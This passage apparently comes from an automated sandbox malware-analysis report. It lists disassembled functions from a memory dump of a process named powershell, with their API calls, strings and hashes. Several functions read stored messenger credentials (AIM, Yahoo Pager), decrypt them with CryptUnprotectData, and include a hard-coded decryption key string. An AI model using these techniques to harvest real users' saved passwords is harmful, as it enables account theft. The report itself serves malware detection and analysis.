        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040B4C8
        • EndDeferWindowPos.USER32(?), ref: 0040B4D1
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: Window$Defer$Rect$BeginClient
        • String ID:
        • API String ID: 2126104762-0
        • Opcode ID: 0757be7f740c367b27a432adcadcbbd04f52c6bec85c836fbe865042ee467c30
        • Instruction ID: fdc4126930c1b8f3c9151252813053957ee6f88c11e53af12b0e4d030a96b888
        • Opcode Fuzzy Hash: 0757be7f740c367b27a432adcadcbbd04f52c6bec85c836fbe865042ee467c30
        • Instruction Fuzzy Hash: CA21D672900609FFDF12CFA8DD89FEEBBB9FB48310F108464FA55A2160C7316A519B24
        Function 0040A129 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
          • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
        • _mbscat.MSVCRT ref: 0040A1EE
        • sprintf.MSVCRT ref: 0040A210
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: FileWrite_mbscatsprintfstrlen
        • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
        • API String ID: 1631269929-4153097237
        • Opcode ID: 3523185fe67812ce5c4df5690e324f3de58a353957d607fc5cd479dc7c7c253a
        • Instruction ID: f5ff55beaed6f71e33551b2c4209876a9ab5e20235427d51249a725151ce9b26
        • Opcode Fuzzy Hash: 3523185fe67812ce5c4df5690e324f3de58a353957d607fc5cd479dc7c7c253a
        • Instruction Fuzzy Hash: 68318231900209AFCF05DF54C8869DE7BB6FF44314F10416AFD11BB2A2DB76A955CB84
        Function 0040876F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100stringCOMMON
        Download Yara Rule
        APIs
        • _mbscpy.MSVCRT ref: 004087EA
          • Part of subcall function 00408BF9: _itoa.MSVCRT ref: 00408C1A
        • strlen.MSVCRT ref: 00408808
        • LoadStringA.USER32(00000000,00000006,?,?), ref: 00408838
        • memcpy.MSVCRT ref: 00408877
          • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408715
          • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408733
          • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408751
          • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408761
        Strings
        • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408783
        • strings, xrefs: 004087E0
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
        • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
        • API String ID: 4036804644-4125592482
        • Opcode ID: ef01070cab15df538a3798e247c3de3082de72e9928e1165ff50cbaae212c905
        • Instruction ID: dfb39b5d66abeec2138625290c7fe1e8033edbc7f9ca8f6d480f1a826448875f
        • Opcode Fuzzy Hash: ef01070cab15df538a3798e247c3de3082de72e9928e1165ff50cbaae212c905
        • Instruction Fuzzy Hash: 60316E3E6001119FD714AF16EE809F63769FB84308794843EEC81A72A6DB39A841CB5E
        Function 0040FD2E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97registryCOMMON
        Download Yara Rule
        APIs
        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,75B4EC10,00000000), ref: 0040FD62
        • RegCloseKey.ADVAPI32(?,?,75B4EC10,00000000), ref: 0040FE4D
          • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
          • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
        • memcpy.MSVCRT ref: 0040FDD4
        • LocalFree.KERNEL32(?,?,00000000,?,?,75B4EC10,00000000), ref: 0040FDE6
        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,75B4EC10,00000000), ref: 0040FE2F
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpy
        • String ID:
        • API String ID: 2372935584-3916222277
        • Opcode ID: f66a63af9bc6ad28e2805ee69a38c801a35cdaa6f28638d5b3a381909aedb857
        • Instruction ID: 0b8e4f374d5667c45180376da1c8b12cffb8e3ff2062487e5a08cff45f7818d2
        • Opcode Fuzzy Hash: f66a63af9bc6ad28e2805ee69a38c801a35cdaa6f28638d5b3a381909aedb857
        • Instruction Fuzzy Hash: 6B414CB2900209ABCF21DF95D940ADEBBF8AF48304F10407BE915B7291D774AA44CFA8
        Function 00408D47 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: ItemMenu$CountInfomemsetstrchr
        • String ID: 0$6
        • API String ID: 2300387033-3849865405
        • Opcode ID: c4cc32d9f86e60e61665d107887000d313b636c57177f5370dd8caf8ca2e51bb
        • Instruction ID: e6c6313dcb9b7a471bbfbaa7ec765517bc0a4c64eff5ea5afbcc667e6a019d72
        • Opcode Fuzzy Hash: c4cc32d9f86e60e61665d107887000d313b636c57177f5370dd8caf8ca2e51bb
        • Instruction Fuzzy Hash: DD21BF71408384AFD7118F11D881A9BB7E8FF85348F044A3FF584A62D0EB39D944CB9A
        Function 00407034 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 59stringCOMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memcpystrlen$memsetsprintf
        • String ID: %s (%s)
        • API String ID: 3756086014-1363028141
        • Opcode ID: 936799879657ece0d987efaaa21eb692f92e76d5c857caaa6a1a5a279cf2af51
        • Instruction ID: a198fb7af375a94c8e27cd288863d28c10177bb58caa4549e63a683f86c2f09a
        • Opcode Fuzzy Hash: 936799879657ece0d987efaaa21eb692f92e76d5c857caaa6a1a5a279cf2af51
        • Instruction Fuzzy Hash: 93114FB2800158BBDB21DF69DC45BDABBBCEF01309F0005AAE644B7101D775AB55CBA5
        Function 00406DCD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: _mbscat$memsetsprintf
        • String ID: %2.2X
        • API String ID: 125969286-791839006
        • Opcode ID: 2a8733490f50d4093b983ca8d1f50ec72e55e73e138ed9e783ee61cb0d8a9bf3
        • Instruction ID: 5142681b0c0ad1f2d34765b6081944bd4f79e84a169991ad97d052608da76018
        • Opcode Fuzzy Hash: 2a8733490f50d4093b983ca8d1f50ec72e55e73e138ed9e783ee61cb0d8a9bf3
        • Instruction Fuzzy Hash: 82012872A0431466D7225A26DC43BEB77AC9B44B05F10007FFC45B51C1FABC96C447D8
        Function 0040496D Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 37COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: _mbscpy$_mbscat
        • String ID: eK@$memcpy$msvcrt.dll
        • API String ID: 2404237207-527332992
        • Opcode ID: 9354cc07b54c0733da4c2861e88293eeaaf788545539071674b28918bacbf150
        • Instruction ID: ade7c94f42c2b1d8f6f4d02d55b8563967db19c46ba0ec0bd93feed85f1333d3
        • Opcode Fuzzy Hash: 9354cc07b54c0733da4c2861e88293eeaaf788545539071674b28918bacbf150
        • Instruction Fuzzy Hash: 7701001144DBC089E372D7289549B97AEE51B22608F48098DD1C647A83D2AAB65CC3BA
        Function 0041212C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36registryCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
        • RegCloseKey.ADVAPI32(0040D439,?,?,0040D439,?,?,?,?,?,00000000,00000000), ref: 00412167
        • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,?,0040D439,?,?,?,?,?,00000000,00000000), ref: 00412178
        • _mbscat.MSVCRT ref: 00412188
          • Part of subcall function 00411D82: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
        Strings
        • SOFTWARE\Microsoft\Windows\CurrentVersion, xrefs: 00412137
        • :\Program Files, xrefs: 0041217E
        • ProgramFilesDir, xrefs: 00412150
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: CloseDirectoryOpenQueryValueWindows_mbscat
        • String ID: :\Program Files$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
        • API String ID: 3464146404-1099425022
        • Opcode ID: e9cddbae49c6936b151603412141959aab3e5c022f3d8ee6b822fd87b43eeab7
        • Instruction ID: 662ef04aa31600ef20de70b7cf87d02e8b1ceff17a77a69e12e4cdaece8db846
        • Opcode Fuzzy Hash: e9cddbae49c6936b151603412141959aab3e5c022f3d8ee6b822fd87b43eeab7
        • Instruction Fuzzy Hash: 2DF0E972508300BFE7119754AD07BCA7FE88F04314F20005BF644A0181FAE96EC0C29D
        Function 00408B7A Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 00408BA5
        • sprintf.MSVCRT ref: 00408BBA
          • Part of subcall function 00408C31: memset.MSVCRT ref: 00408C55
          • Part of subcall function 00408C31: GetPrivateProfileStringA.KERNEL32(0041E308,0000000A,00417C88,?,00001000,0041E200), ref: 00408C77
          • Part of subcall function 00408C31: _mbscpy.MSVCRT ref: 00408C91
        • SetWindowTextA.USER32(?,?), ref: 00408BE1
        • EnumChildWindows.USER32(?,Function_00008B1D,00000000), ref: 00408BF1
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
        • String ID: caption$dialog_%d
        • API String ID: 2923679083-4161923789
        • Opcode ID: c978e5f3a12a1d3306ee320e52636f41f7f8daffb1fc4c3eb51a0652a28ecf73
        • Instruction ID: de831da21bc0203e5008b33b3115c9aeec9d60fef0dfeaee9ccd5ecb51ae2e74
        • Opcode Fuzzy Hash: c978e5f3a12a1d3306ee320e52636f41f7f8daffb1fc4c3eb51a0652a28ecf73
        • Instruction Fuzzy Hash: EEF0C27054034CBAEB129751DC06FD93A686B08B05F0440AABB84B11D1DEB896C08B1D
        Function 00411356 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
        Download Yara Rule
        APIs
        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004107B0,00000000,?), ref: 0041138D
        • memset.MSVCRT ref: 004113EA
        • memset.MSVCRT ref: 004113FC
          • Part of subcall function 00411172: _mbscpy.MSVCRT ref: 00411198
        • memset.MSVCRT ref: 004114E3
        • _mbscpy.MSVCRT ref: 00411508
        • CloseHandle.KERNEL32(?,004107B0,?), ref: 00411552
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memset$_mbscpy$CloseHandleOpenProcess
        • String ID:
        • API String ID: 3974772901-0
        • Opcode ID: 745c210aaaa6b85eaae148b780003da6f3cf09640a074c35b8bdb1d56aff2f36
        • Instruction ID: 2b4e81a65471dd6bda77e3e7a539d18b8ecf8660f8cea3ab0205070076e1852f
        • Opcode Fuzzy Hash: 745c210aaaa6b85eaae148b780003da6f3cf09640a074c35b8bdb1d56aff2f36
        • Instruction Fuzzy Hash: 5F511FB1D00218ABDF10DF95DC85ADEBBB9EF48704F0040A6E609A6251D7759FC0CF69
        Function 0040807D Relevance: 9.1, APIs: 6, Instructions: 98stringCOMMON
        Download Yara Rule
        APIs
        • memcpy.MSVCRT ref: 00408094
        • memcpy.MSVCRT ref: 004080A3
          • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C9BA
          • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9E6
          • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9FC
          • Part of subcall function 0040C9C7: memcpy.MSVCRT ref: 0040CA33
          • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA3D
        • memset.MSVCRT ref: 00408120
        • strlen.MSVCRT ref: 00408160
        • _mbscpy.MSVCRT ref: 0040817F
        • _mbscpy.MSVCRT ref: 0040818C
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memcpymemset$_mbscpy$strlen
        • String ID:
        • API String ID: 2712745786-0
        • Opcode ID: 50e45666a0393e5ef850d505c3c738091cb5fcbebc819cab067422742a707744
        • Instruction ID: bdbe0c05a74f47d21f032104af17620136749afb05b7a30319e2a8bb584ff9b0
        • Opcode Fuzzy Hash: 50e45666a0393e5ef850d505c3c738091cb5fcbebc819cab067422742a707744
        • Instruction Fuzzy Hash: AC3194728001099ACF14EF65DC85BDE77BCAF44304F00446FE549E7181EB74A68A8BA5
        Function 0040B8FA Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 70COMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 0040B91A
          • Part of subcall function 0040876F: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408838
          • Part of subcall function 0040876F: memcpy.MSVCRT ref: 00408877
          • Part of subcall function 0040876F: _mbscpy.MSVCRT ref: 004087EA
          • Part of subcall function 0040876F: strlen.MSVCRT ref: 00408808
          • Part of subcall function 00407034: memset.MSVCRT ref: 00407055
          • Part of subcall function 00407034: sprintf.MSVCRT ref: 0040707E
          • Part of subcall function 00407034: strlen.MSVCRT ref: 0040708A
          • Part of subcall function 00407034: memcpy.MSVCRT ref: 0040709F
          • Part of subcall function 00407034: strlen.MSVCRT ref: 004070AD
          • Part of subcall function 00407034: memcpy.MSVCRT ref: 004070BD
          • Part of subcall function 00406E60: _mbscpy.MSVCRT ref: 00406EC6
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
        • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
        • API String ID: 2726666094-3614832568
        • Opcode ID: 48ad67bf17a677834281717159f6163cc093dbae317e4fe0e66c085f04f9eb92
        • Instruction ID: 663635aaa2767a47ae833ce325b1c2bbb94a135e02c7cec880bc1d98f4d47d81
        • Opcode Fuzzy Hash: 48ad67bf17a677834281717159f6163cc093dbae317e4fe0e66c085f04f9eb92
        • Instruction Fuzzy Hash: 8E21EBB5C002189FCB01FFA5DA817DDBBB4AB08708F20417FE549B7286DF381A558B99
        Function 00406CAA Relevance: 9.1, APIs: 6, Instructions: 57COMMON
        Download Yara Rule
        APIs
        • GetDC.USER32(00000000), ref: 00406CB5
        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00406CC6
        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00406CCD
        • ReleaseDC.USER32(00000000,00000000), ref: 00406CD5
        • GetWindowRect.USER32(?,?), ref: 00406CE2
        • MoveWindow.USER32(?,?,?,?,?,00000001,?,76936C10), ref: 00406D20
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: CapsDeviceWindow$MoveRectRelease
        • String ID:
        • API String ID: 3197862061-0
        • Opcode ID: 46aa025759630b167b55e315cdb859b7672f25e3c69014d30f42312940603d98
        • Instruction ID: 8a34af0b3d0659c25a6c3d8e0783375a2f2358695c0a050eea5ba45bf34a7176
        • Opcode Fuzzy Hash: 46aa025759630b167b55e315cdb859b7672f25e3c69014d30f42312940603d98
        • Instruction Fuzzy Hash: 62118E32A00219EFDB009FB9CD4DEEF7FB8EB84750F054165F905A7250DA70AD01CAA0
        Function 00403D24 Relevance: 9.1, APIs: 6, Instructions: 56filestringCOMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 00403D49
        • memset.MSVCRT ref: 00403D62
        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403D79
        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403D98
        • strlen.MSVCRT ref: 00403DAA
        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403DBB
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: ByteCharMultiWidememset$FileWritestrlen
        • String ID:
        • API String ID: 1786725549-0
        • Opcode ID: 57566774f34a7d6a244140384ef089970c63e573ccff7e860df9a23001c61ee2
        • Instruction ID: 833f6c37e82b16f9b4c34b80bb2ce5ff812abd73926e68a98c8801a8732a43de
        • Opcode Fuzzy Hash: 57566774f34a7d6a244140384ef089970c63e573ccff7e860df9a23001c61ee2
        • Instruction Fuzzy Hash: 2C111BB644122CFEEB119B94DC89EEB77ACEF08354F1041A6B715E2091E6349F448BB8
        Function 0040F37A Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 56COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
          • Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972
        • _strcmpi.MSVCRT ref: 0040F3D1
        • _strcmpi.MSVCRT ref: 0040F3F0
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: _strcmpi$memcpystrlen
        • String ID: http://www.ebuddy.com$http://www.imvu.com$https://www.google.com
        • API String ID: 2025310588-2353251349
        • Opcode ID: 6aa85cd40264e4eeed6d724107f07241557df926fb76c4270f31d7a56a6e10ff
        • Instruction ID: 147ef2bbec41d1b0b79b570ae49dc02a3b2ea9406cbc79ec07c01e0a249b4c29
        • Opcode Fuzzy Hash: 6aa85cd40264e4eeed6d724107f07241557df926fb76c4270f31d7a56a6e10ff
        • Instruction Fuzzy Hash: 1B11C1B21083409AD330EF25D8457DB77E8EFA4305F10893FE998A2182EB785649875A
        Function 00412E4D Relevance: 9.0, APIs: 6, Instructions: 46COMMON
        Download Yara Rule
        APIs
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: ??3@
        • String ID:
        • API String ID: 613200358-0
        • Opcode ID: d76c6e9bbc824b9e791745045f41857ca1225a75c0f91e99517293dc547767ba
        • Instruction ID: 39cb4549293e6cd4e8f45f1fb6a35693fcb7bd1e2582dcc07fe9920ce8c868a3
        • Opcode Fuzzy Hash: d76c6e9bbc824b9e791745045f41857ca1225a75c0f91e99517293dc547767ba
        • Instruction Fuzzy Hash: 83014F32A0AA3527C6257E2675017CBA3646F05B29F15420FF808B73428B6C7DE046DE
        Function 00413B1D Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 00413B3E
        • memset.MSVCRT ref: 00413B57
        • memset.MSVCRT ref: 00413B6B
          • Part of subcall function 00413646: strlen.MSVCRT ref: 00413653
        • strlen.MSVCRT ref: 00413B87
        • memcpy.MSVCRT ref: 00413BAC
        • memcpy.MSVCRT ref: 00413BC2
          • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C9BA
          • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9E6
          • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9FC
          • Part of subcall function 0040C9C7: memcpy.MSVCRT ref: 0040CA33
          • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA3D
        • memcpy.MSVCRT ref: 00413C02
          • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C96C
          • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C996
          • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA0E
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memcpymemset$strlen
        • String ID:
        • API String ID: 2142929671-0
        • Opcode ID: 12c23c21f074b2e82c1811d2f488e6951e7381ea67b5b6e5923544c93fd9d40f
        • Instruction ID: 3b0ef80f5f4f1d26b85f6ed19fc7f93af9089081b0544b1b4270697ce1475561
        • Opcode Fuzzy Hash: 12c23c21f074b2e82c1811d2f488e6951e7381ea67b5b6e5923544c93fd9d40f
        • Instruction Fuzzy Hash: EB512CB290011DAFCB10EF55DC81AEEB7A9BF04309F5445BAE509E7141EB34AF898F94
        Function 00402730 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99stringCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00411D82: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
        • strtoul.MSVCRT ref: 00402782
        • _mbscpy.MSVCRT ref: 00402807
        • _mbscpy.MSVCRT ref: 00402817
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: _mbscpy$QueryValuestrtoul
        • String ID: 3 d5JKNNC,MANSLDJQ32ELK1N4SAIp08$TRIPWD
        • API String ID: 4008679483-1446091703
        • Opcode ID: e02f09f827b7a1402bbcc64ad373729b872f3cbb9493f1593754ca161662a432
        • Instruction ID: 4ca16360b260b82c0f814568f8b1846068da3ba20428fc10580ffdfcf904f702
        • Opcode Fuzzy Hash: e02f09f827b7a1402bbcc64ad373729b872f3cbb9493f1593754ca161662a432
        • Instruction Fuzzy Hash: 2C31E83280424C6EDF01DBB8E941ADFBFB4AF19310F1444AAE944FB191D674AB49CBA5
        Function 0040B2F5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: Cursor_mbsicmpqsort
        • String ID: /nosort$/sort
        • API String ID: 882979914-1578091866
        • Opcode ID: aca6ef3a54d3682c88ae91ffd4c16f467d4d6d8ebe203e6f6b8079e39e5b1455
        • Instruction ID: c642ed81bba6fc27793a5d708b6807a860a9cb0bcd27181b40ce8d315371ea34
        • Opcode Fuzzy Hash: aca6ef3a54d3682c88ae91ffd4c16f467d4d6d8ebe203e6f6b8079e39e5b1455
        • Instruction Fuzzy Hash: 3721A231600200DFDB05EF25C8C1E9577A9EF85728F2400BAFD19AF2D2CB79A841CB69
        Function 0040C427 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60windowCOMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: ??2@$DeleteIconLoadObject
        • String ID: ;@
        • API String ID: 1986663749-2925476404
        • Opcode ID: aac6870d61330ff5dfa6fb924a5771f84dfd7bc32999be728c9d3dbb0e26c9e2
        • Instruction ID: 4d16bad446557b49ffcede9a37569aa771c04751a2fd478bf3dc9e82e5d405e4
        • Opcode Fuzzy Hash: aac6870d61330ff5dfa6fb924a5771f84dfd7bc32999be728c9d3dbb0e26c9e2
        • Instruction Fuzzy Hash: A921AE70900314CBCB50AF6698846D97BA8BB01714F9886BFEC0DAF286CF7855408F68
        Function 00413735 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 55registryCOMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 00413757
          • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
          • Part of subcall function 00411D82: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
        • RegCloseKey.ADVAPI32(?,?,?,?,000003FF,?,00000000), ref: 004137BF
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: CloseOpenQueryValuememset
        • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
        • API String ID: 1830152886-1703613266
        • Opcode ID: 0237e653f74925a001417010736f5cc4d8aa8eddb031e6596643e2c9a8a80dd1
        • Instruction ID: 02697a5e3e6c6c3f452774ad5988b122dd70f79e91add571e9a1c89a2d7602b2
        • Opcode Fuzzy Hash: 0237e653f74925a001417010736f5cc4d8aa8eddb031e6596643e2c9a8a80dd1
        • Instruction Fuzzy Hash: 9301F9B6B00104FFEF106A95AD42ADA7BACDF04315F10406BFE04F3251E675AF8586AC
        Function 00412396 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON
        Download Yara Rule
        APIs
        • SHGetMalloc.SHELL32(?), ref: 004123A6
        • SHBrowseForFolder.SHELL32(?), ref: 004123D8
        • SHGetPathFromIDList.SHELL32(00000000,?), ref: 004123EC
        • _mbscpy.MSVCRT ref: 004123FF
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: BrowseFolderFromListMallocPath_mbscpy
        • String ID: [@
        • API String ID: 1479990042-3416412563
        • Opcode ID: 0ed61469ac53670edaa810a2117bfc786e2c3e1837aac1e3952743f7bc219d88
        • Instruction ID: 5ef3e47e4b44953a2dad9ee1bf13406931f922e9c8d23326f6bb0268a582906b
        • Opcode Fuzzy Hash: 0ed61469ac53670edaa810a2117bfc786e2c3e1837aac1e3952743f7bc219d88
